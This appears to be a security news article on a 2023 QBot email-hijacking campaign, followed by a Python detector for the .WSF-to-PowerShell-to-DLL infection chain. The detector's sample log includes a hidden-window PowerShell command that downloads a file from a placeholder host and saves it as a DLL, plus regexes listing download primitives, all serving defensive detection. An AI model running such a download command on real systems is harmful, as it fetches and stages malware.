According to recent research from Kaspersky, a new QBot malware campaign is using hacked business communications to lure unknowing victims into installing the malware. Since it started on April 4, 2023, the most recent activity has predominantly targeted consumers in Germany, Argentina, Italy, Algeria, Spain, the United States, Russia, France, the United Kingdom, and Morocco.
QBot, also known as Qakbot or Pinkslipbot, is a banking trojan that has been active since at least 2007. Besides stealing passwords and cookies from web browsers, it acts as a backdoor for delivering ransomware and other next-stage payloads such as Cobalt Strike. Distributed through phishing attacks, the malware has been upgraded continuously over its lifetime and now includes anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. According to Check Point, it was also the most prevalent malware of March 2023.
“Early on, it was distributed through infected websites and pirated software,” Kaspersky researchers said, explaining QBot’s distribution methods. “Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings.”
Email thread hijacking is nothing new. Attackers insert themselves into ongoing business conversations, or start new ones, using details taken from previously compromised email accounts. The goal is to persuade the recipient to open a malicious link or attachment, for example a PDF file disguised as an Office 365 or Azure notification.
Opening the document retrieves a file from a malicious website that contains an obfuscated Windows Script File (.WSF). That script in turn carries a PowerShell script which downloads a malicious DLL from a remote server; the DLL is the QBot malware itself. The findings coincide with Elastic Security Labs' discovery of a multi-stage social engineering campaign that uses weaponized Word documents to spread Agent Tesla and XWorm via a custom .NET-based loader.
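The chain above (a script host running a .WSF, spawning PowerShell that downloads a DLL) leaves a recognisable parent/child pattern in process-creation telemetry. The following is an added detection example, not code from Kaspersky's or Elastic's research: it parses a few constructed Sysmon-style process-creation records and flags that sequence. The log format, PIDs, paths, host name and URLs are all assumptions made for the example.

```python
"""Flag the .WSF -> PowerShell download -> DLL delivery chain in process-creation events.

Added example; the event format, paths, PIDs and URLs below are constructed
and do not come from the research this article summarises.
"""
import re
from dataclasses import dataclass

# Constructed sample log: one key=value process-creation record per line.
SAMPLE_LOG = r'''
pid=4100 ppid=1200 image="C:\Windows\explorer.exe" cmdline="C:\Windows\explorer.exe"
pid=4312 ppid=4100 image="C:\Windows\System32\wscript.exe" cmdline="wscript.exe C:\Users\u\Downloads\Invoice_0404.wsf"
pid=4330 ppid=4312 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.png','C:\Users\u\AppData\Local\Temp\p.dll')"
pid=4400 ppid=4100 image="C:\Windows\System32\wscript.exe" cmdline="wscript.exe \\fileserver\netlogon\map_drives.vbs"
pid=4500 ppid=4100 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe Invoke-WebRequest https://updates.example.invalid/manifest.json"
'''


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


EVENT_RE = re.compile(r'pid=(\d+) ppid=(\d+) image="([^"]*)" cmdline="([^"]*)"')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# PowerShell primitives commonly used to fetch a payload from a remote server.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I,
)
# A path ending in .dll anywhere in the command line.
DLL_RE = re.compile(r"[\w:\\./-]+\.dll\b", re.I)


def parse_log(text):
    """Turn the key=value records into ProcEvent objects; malformed lines are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(ProcEvent(int(m[1]), int(m[2]), m[3], m[4]))
    return events


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_wsf_download_chains(events):
    """Return one alert per script host running a .wsf whose PowerShell child downloads a file.

    Severity is raised to 'high' when the PowerShell command line also names a .dll,
    which is the final stage described in the article.
    """
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    alerts = []
    for host in events:
        if basename(host.image) not in SCRIPT_HOSTS or ".wsf" not in host.cmdline.lower():
            continue
        for child in children.get(host.pid, []):
            if basename(child.image) != "powershell.exe" or not DOWNLOAD_RE.search(child.cmdline):
                continue
            dlls = DLL_RE.findall(child.cmdline)
            alerts.append({
                "host_pid": host.pid,
                "script": host.cmdline,
                "powershell_pid": child.pid,
                "dll_written": dlls,
                "severity": "high" if dlls else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_wsf_download_chains(parse_log(SAMPLE_LOG)):
        print(alert)
```

The benign records (a logon .vbs run from wscript.exe, and a PowerShell Invoke-WebRequest launched directly from explorer.exe) are deliberately left unflagged: the rule keys on the parent/child relationship rather than on any single process, which is what keeps it quiet on ordinary administrative scripting.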